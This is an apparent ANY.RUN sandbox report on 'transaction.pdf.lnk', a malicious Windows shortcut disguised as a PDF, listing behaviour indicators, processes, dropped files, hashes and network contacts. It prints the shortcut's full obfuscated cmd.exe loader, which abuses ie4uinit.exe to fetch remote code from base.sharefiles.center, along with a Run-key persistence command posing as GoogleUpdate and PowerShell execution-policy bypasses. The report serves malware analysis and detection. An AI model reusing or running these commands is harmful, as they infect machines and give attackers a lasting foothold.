File name:

transaction.pdf.lnk

Full analysis: https://app.any.run/tasks/540c48e8-8dd1-44f6-a7b7-f4f74de446f7
Verdict: Malicious activity
Analysis date: September 08, 2024, 19:05:12
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Icon number=13, Archive, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hide
MD5:

B9A843367B406B486084FB23C73BDCD5

SHA1:

9607E1E2DD38B9A74D97FEB0D279177B8602FECF

SHA256:

25F7288B294090810B61C199A8258DA6547609ACAEE5CC4BAC47C0775102869B

SSDEEP:

96:8vGDTvTb6KVmDd/vjHZllY0+FrFYdjFPZe1Kdlhg:8+Lts5T

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Accesses name of a computer manufacturer via WMI (SCRIPT)

      • ie4uinit.exe (PID: 5700)

    • Accesses environment variables (SCRIPT)

      • ie4uinit.exe (PID: 5700)

    • Gets %appdata% folder path (SCRIPT)

      • ie4uinit.exe (PID: 5700)

    • Changes the autorun value in the registry

      • reg.exe (PID: 3568)

    • Deletes a file (SCRIPT)

      • cscript.exe (PID: 4316)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6536)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3448)

    • Uses sleep, probably for evasion detection (SCRIPT)

      • cscript.exe (PID: 4316)

    • Sends HTTP request (SCRIPT)

      • cscript.exe (PID: 4316)

    • Opens an HTTP connection (SCRIPT)

      • cscript.exe (PID: 4316)

    • Creates internet connection object (SCRIPT)

      • cscript.exe (PID: 4316)

  • SUSPICIOUS

    • Starts a Microsoft application from unusual location

      • ie4uinit.exe (PID: 5548)
      • ie4uinit.exe (PID: 5700)

    • Application launched itself

      • ie4uinit.exe (PID: 5700)

    • Reads security settings of Internet Explorer

      • ie4uinit.exe (PID: 5700)
      • ie4uinit.exe (PID: 5548)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 2456)

    • Executed via WMI

      • ie4uinit.exe (PID: 5700)

    • Process drops legitimate windows executable

      • cmd.exe (PID: 2456)

    • Uses WMIC.EXE to create a new process

      • cmd.exe (PID: 2456)

    • Executes WMI query (SCRIPT)

      • ie4uinit.exe (PID: 5700)

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • ie4uinit.exe (PID: 5700)

    • Accesses ComputerSystem(Win32_ComputerSystem) via WMI (SCRIPT)

      • ie4uinit.exe (PID: 5700)

    • Access Product Name via WMI (SCRIPT)

      • ie4uinit.exe (PID: 5700)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • ie4uinit.exe (PID: 5700)
      • cscript.exe (PID: 4316)

    • Writes binary data to a Stream object (SCRIPT)

      • ie4uinit.exe (PID: 5700)

    • Reads the date of Windows installation

      • ie4uinit.exe (PID: 5700)

    • Uses RUNDLL32.EXE to load library

      • ie4uinit.exe (PID: 5548)

    • Checks Windows Trust Settings

      • ie4uinit.exe (PID: 5700)

    • Accesses computer name via WMI (SCRIPT)

      • wscript.exe (PID: 5940)
      • wscript.exe (PID: 5468)
      • wscript.exe (PID: 6968)
      • ie4uinit.exe (PID: 5700)
      • cscript.exe (PID: 4316)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 5940)
      • wscript.exe (PID: 5468)
      • wscript.exe (PID: 6968)

    • The process executes Powershell scripts

      • cmd.exe (PID: 6672)
      • ie4uinit.exe (PID: 5700)
      • cmd.exe (PID: 3448)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6316)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3448)

    • Runs shell command (SCRIPT)

      • ie4uinit.exe (PID: 5700)
      • wscript.exe (PID: 5468)
      • wscript.exe (PID: 6968)
      • wscript.exe (PID: 5940)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6536)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 6536)

    • Converts a string into array of characters (POWERSHELL)

      • powershell.exe (PID: 6536)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6536)

    • Accesses command line arguments (SCRIPT)

      • cscript.exe (PID: 4316)

    • Gets full path of the running script (SCRIPT)

      • cscript.exe (PID: 4316)

    • Adds, changes, or deletes HTTP request header (SCRIPT)

      • cscript.exe (PID: 4316)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3448)

    • The process executes JS scripts

      • powershell.exe (PID: 6536)

  • INFO

    • Reads the computer name

      • ie4uinit.exe (PID: 5548)
      • ie4uinit.exe (PID: 5700)

    • Checks supported languages

      • ie4uinit.exe (PID: 5700)
      • ie4uinit.exe (PID: 5548)

    • Creates files or folders in the user directory

      • ie4uinit.exe (PID: 5700)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 7052)
      • cscript.exe (PID: 4316)

    • Changes file name

      • cmd.exe (PID: 2456)

    • Checks proxy server information

      • ie4uinit.exe (PID: 5700)
      • cscript.exe (PID: 4316)
      • slui.exe (PID: 7040)

    • Reads the software policy settings

      • ie4uinit.exe (PID: 5700)
      • cscript.exe (PID: 4316)
      • slui.exe (PID: 736)
      • slui.exe (PID: 7040)

    • Reads Environment values

      • ie4uinit.exe (PID: 5700)

    • The process uses the downloaded file

      • ie4uinit.exe (PID: 5700)
      • wscript.exe (PID: 5468)
      • wscript.exe (PID: 6968)
      • wscript.exe (PID: 5940)

    • Process checks computer location settings

      • ie4uinit.exe (PID: 5700)

    • Reads the machine GUID from the registry

      • ie4uinit.exe (PID: 5700)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6536)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, WorkingDir, CommandArgs, IconFile, Unicode, NoLinkInfo
FileAttributes: Archive
TargetFileSize: -
IconIndex: 13
RunWindow: Normal
HotKey: (none)
TargetFileDOSName: cmd.exe
WorkingDirectory: C:\Windows\System32
CommandLineArguments: /v /c "set "qtJ1=e"&&set "NND2=n"&&set "WDx3=c"&&set "HnH4=r"&&set "LGN5=y"&&set "hxR6=p"&&set "LLU7=t"&&set "tfN8=i"&&set "bvl9=o"&&set "dkk10=n"&&set "oDx11=k"&&set "yos12=e"&&set "xJa13=y"&@echo off & (for %t in ("[v!yos12!!HnH4!s!tfN8!!bvl9!!dkk10!]" "s!tfN8!g!dkk10!a!LLU7!u!HnH4!!yos12! = $w!tfN8!!dkk10!d!bvl9!ws !dkk10!!LLU7!f7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[d!yos12!s!LLU7!!tfN8!!dkk10!a!LLU7!!tfN8!!bvl9!!dkk10!d!tfN8!!HnH4!s]" "A45E=01" "[d!yos12!faul!LLU7!!tfN8!!dkk10!s!LLU7!all.w!tfN8!!dkk10!d!bvl9!ws7]" "U!dkk10!R!yos12!g!tfN8!s!LLU7!!yos12!!HnH4!OCXs=F07FD" "d!yos12!lf!tfN8!l!yos12!s=A45E" "[F07FD]" "%11%\s!WDx3!R!bvl9!bj,NI,h!LLU7!!LLU7!!hxR6!s://bas!yos12!.sha!HnH4!!yos12!f!tfN8!l!yos12!s.!WDx3!!yos12!!dkk10!!LLU7!!yos12!!HnH4!/%COMPUTERNAME%/0" "[A45E]" "!tfN8!!yos12!u!tfN8!!dkk10!!tfN8!%OAL%f" "[s!LLU7!!HnH4!!tfN8!!dkk10!gs]" "s!yos12!!HnH4!v!tfN8!!WDx3!!yos12!!dkk10!am!yos12!=' '" "sh!bvl9!!HnH4!!LLU7!sv!WDx3!!dkk10!am!yos12!=' '" "OAL=!LLU7!.!tfN8!!dkk10!") do echo %~t) > "%tmp%\a.!LLU7!x!LLU7!" & copy /Y %windir%\S!xJa13!s!LLU7!!yos12!m32\!tfN8!!yos12!4u!tfN8!!dkk10!!tfN8!!LLU7!.!yos12!x!yos12! %tmp%\ & ren %tmp%\a.!LLU7!x!LLU7! !tfN8!!yos12!u!tfN8!!dkk10!!tfN8!!LLU7!.!tfN8!!dkk10!f & s!LLU7!a!HnH4!!LLU7! "" /m!tfN8!!dkk10! wm!tfN8!!WDx3! !hxR6!!HnH4!!bvl9!!WDx3!!yos12!ss !WDx3!all !WDx3!!HnH4!!yos12!a!LLU7!!yos12! "%tmp%\!tfN8!!yos12!4u!tfN8!!dkk10!!tfN8!!LLU7!.!yos12!x!yos12! -Bas!yos12!S!yos12!!LLU7!!LLU7!!tfN8!!dkk10!gs""
IconFileName: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
152
Monitored processes
22
Malicious processes
7
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe conhost.exe no specs wmic.exe no specs conhost.exe no specs ie4uinit.exe ie4uinit.exe no specs rundll32.exe no specs wscript.exe no specs wscript.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs wscript.exe no specs reg.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs cscript.exe sppextcomobj.exe no specs slui.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
736"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1164\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2456"C:\Windows\System32\cmd.exe" /v /c "set "qtJ1=e"&&set "NND2=n"&&set "WDx3=c"&&set "HnH4=r"&&set "LGN5=y"&&set "hxR6=p"&&set "LLU7=t"&&set "tfN8=i"&&set "bvl9=o"&&set "dkk10=n"&&set "oDx11=k"&&set "yos12=e"&&set "xJa13=y"&@echo off & (for %t in ("[v!yos12!!HnH4!s!tfN8!!bvl9!!dkk10!]" "s!tfN8!g!dkk10!a!LLU7!u!HnH4!!yos12! = $w!tfN8!!dkk10!d!bvl9!ws !dkk10!!LLU7!f7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[d!yos12!s!LLU7!!tfN8!!dkk10!a!LLU7!!tfN8!!bvl9!!dkk10!d!tfN8!!HnH4!s]" "A45E=01" "[d!yos12!faul!LLU7!!tfN8!!dkk10!s!LLU7!all.w!tfN8!!dkk10!d!bvl9!ws7]" "U!dkk10!R!yos12!g!tfN8!s!LLU7!!yos12!!HnH4!OCXs=F07FD" "d!yos12!lf!tfN8!l!yos12!s=A45E" "[F07FD]" "%11%\s!WDx3!R!bvl9!bj,NI,h!LLU7!!LLU7!!hxR6!s://bas!yos12!.sha!HnH4!!yos12!f!tfN8!l!yos12!s.!WDx3!!yos12!!dkk10!!LLU7!!yos12!!HnH4!/DESKTOP-JGLLJLD/0" "[A45E]" "!tfN8!!yos12!u!tfN8!!dkk10!!tfN8!%OAL%f" "[s!LLU7!!HnH4!!tfN8!!dkk10!gs]" "s!yos12!!HnH4!v!tfN8!!WDx3!!yos12!!dkk10!am!yos12!=' '" "sh!bvl9!!HnH4!!LLU7!sv!WDx3!!dkk10!am!yos12!=' '" "OAL=!LLU7!.!tfN8!!dkk10!") do echo %~t) > "C:\Users\admin\AppData\Local\Temp\a.!LLU7!x!LLU7!" & copy /Y C:\WINDOWS\S!xJa13!s!LLU7!!yos12!m32\!tfN8!!yos12!4u!tfN8!!dkk10!!tfN8!!LLU7!.!yos12!x!yos12! C:\Users\admin\AppData\Local\Temp\ & ren C:\Users\admin\AppData\Local\Temp\a.!LLU7!x!LLU7! !tfN8!!yos12!u!tfN8!!dkk10!!tfN8!!LLU7!.!tfN8!!dkk10!f & s!LLU7!a!HnH4!!LLU7! "" /m!tfN8!!dkk10! wm!tfN8!!WDx3! !hxR6!!HnH4!!bvl9!!WDx3!!yos12!ss !WDx3!all !WDx3!!HnH4!!yos12!a!LLU7!!yos12! "C:\Users\admin\AppData\Local\Temp\!tfN8!!yos12!4u!tfN8!!dkk10!!tfN8!!LLU7!.!yos12!x!yos12! -Bas!yos12!S!yos12!!LLU7!!LLU7!!tfN8!!dkk10!gs""C:\Windows\System32\cmd.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
3208\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3448"C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Roaming\Adobe\KSAhLDEA.ps1 DESKTOP-JGLLJLDC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
3568reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\admin\AppData\Roaming\Adobe\NjA9FDUjPAAA.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Roaming\Adobe\KSAhLDEA.ps1" DESKTOP-JGLLJLD" /fC:\Windows\System32\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
3900\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4316"C:\WINDOWS\system32\cscript.exe" //nologo "C:\Users\admin\AppData\Local\Microsoft\hello.js" DESKTOP-JGLLJLD C:\Windows\System32\cscript.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\cscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5184C:\WINDOWS\system32\RunDll32.exe C:\WINDOWS\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\System32\rundll32.exeie4uinit.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
5468"C:\Windows\System32\wscript.exe" "C:\Users\admin\AppData\Roaming\Adobe\NjA9FDUjPAAA.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\admin\AppData\Roaming\Adobe\NjA9FDUjPAAA.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\admin\AppData\Roaming\Adobe\KSAhLDEA.ps1' DESKTOP-JGLLJLD' /fC:\Windows\System32\wscript.exeie4uinit.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
10 107
Read events
10 056
Write events
51
Delete events
0

Modification events

(PID) Process:(5700) ie4uinit.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5
Operation:writeName:IEPropFontName
Value:
Times New Roman
(PID) Process:(5700) ie4uinit.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5
Operation:writeName:IEFixedFontName
Value:
Courier New
(PID) Process:(5700) ie4uinit.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6
Operation:writeName:IEPropFontName
Value:
Times New Roman
(PID) Process:(5700) ie4uinit.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6
Operation:writeName:IEFixedFontName
Value:
Courier New
(PID) Process:(5700) ie4uinit.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12
Operation:writeName:IEPropFontName
Value:
Raavi
(PID) Process:(5700) ie4uinit.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12
Operation:writeName:IEFixedFontName
Value:
Raavi
(PID) Process:(5700) ie4uinit.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13
Operation:writeName:IEPropFontName
Value:
Shruti
(PID) Process:(5700) ie4uinit.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13
Operation:writeName:IEFixedFontName
Value:
Shruti
(PID) Process:(5700) ie4uinit.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14
Operation:writeName:IEPropFontName
Value:
Kalinga
(PID) Process:(5700) ie4uinit.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14
Operation:writeName:IEFixedFontName
Value:
Kalinga
Executable files
3
Suspicious files
5
Text files
14
Unknown types
1

Dropped files

PID
Process
Filename
Type
2456cmd.exeC:\Users\admin\AppData\Local\Temp\ie4uinit.exeexecutable
MD5:FC4692D88845173CB727A17397A3D1FD
SHA256:59156DDFF65A95CD423207F5DEA18ECE3E0CD23B28C73FD837809AC23E0FF83A
5700ie4uinit.exeC:\Users\admin\AppData\Roaming\Adobe\KSAhLDEA.ps1text
MD5:4D5DFBE6A40C752C0C18A01170516ACA
SHA256:A707F8B2D9E234C3A5D6022E5D34DCA31849006C2E064334AF6C4C9047A168A4
2456cmd.exeC:\Users\admin\AppData\Local\Temp\ieuinit.infini
MD5:67E23944384903E5BCF8E7435CEEB0F9
SHA256:4ED1B5537E767C2111A5D80F8EEFF7C3F05CDDD3AB3BA0BC9B7F462D2AB4C3CC
5548ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.logtext
MD5:542E76A4634F453520B4CB6BE98C72E3
SHA256:BEC17B3950B80021BD9ED72E156D81056C7B5C0214C4BE1CF318EAA0B8BA08A6
5700ie4uinit.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:FFB5572BE6ECDA45D1FB600485D20462
SHA256:8C5216E168A59E9826DAB263BBA34934B323F71C4762E6B23148873F96B3B164
5700ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\MCArPwAA0text
MD5:47DFC5EC741633AA4EE18F869BD0993C
SHA256:D696A2162EBC06CFC7397985C7EAA0FA95169D9D797C7A29085AA4D0CD4191AD
5700ie4uinit.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12der
MD5:7FB5FA1534DCF77F2125B2403B30A0EE
SHA256:33A39E9EC2133230533A686EC43760026E014A3828C703707ACBC150FE40FD6F
5700ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\MCArPwAA1text
MD5:0E04585FB48537E61DE5CB117D09798F
SHA256:04B95E6346DDB7A182E3A6B3D0F3DD519012BF3D96043F6EE5E75ECA34523931
5700ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.baktext
MD5:4B406A2E542690803FF4266440E42745
SHA256:48630371E6B16F2762363848C0B42A8E68A16C94C104C66B9F53D5E0E043C77F
5700ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\0[1].xmlxml
MD5:C451D56147EA838783A2A8F0C4B86FBA
SHA256:1201734D6F32CD0DA2DB525CC441127FF885FFFC1011F139EFB2CD5FB8FBED6D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
40
DNS requests
18
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5700
ie4uinit.exe
GET
200
142.250.186.99:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
5700
ie4uinit.exe
GET
200
142.250.186.99:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
1780
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6056
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7140
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7140
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
6056
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6276
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2120
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5700
ie4uinit.exe
188.114.96.3:443
base.sharefiles.center
CLOUDFLARENET
NL
malicious
5700
ie4uinit.exe
142.250.186.99:80
c.pki.goog
GOOGLE
US
whitelisted
3260
svchost.exe
40.115.3.253:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4316
cscript.exe
188.114.96.3:443
base.sharefiles.center
CLOUDFLARENET
NL
malicious
1780
svchost.exe
20.190.159.4:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1780
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 40.127.240.158
  • 51.124.78.146
whitelisted
google.com
  • 216.58.206.78
whitelisted
base.sharefiles.center
  • 188.114.96.3
  • 188.114.97.3
malicious
c.pki.goog
  • 142.250.186.99
whitelisted
client.wns.windows.com
  • 40.115.3.253
whitelisted
ipa.sharefiles.center
  • 188.114.96.3
  • 188.114.97.3
malicious
login.live.com
  • 20.190.159.4
  • 20.190.159.71
  • 20.190.159.75
  • 40.126.31.71
  • 20.190.159.64
  • 20.190.159.23
  • 40.126.31.69
  • 20.190.159.68
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
slscr.update.microsoft.com
  • 20.114.59.183
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
transaction.pdf.lnk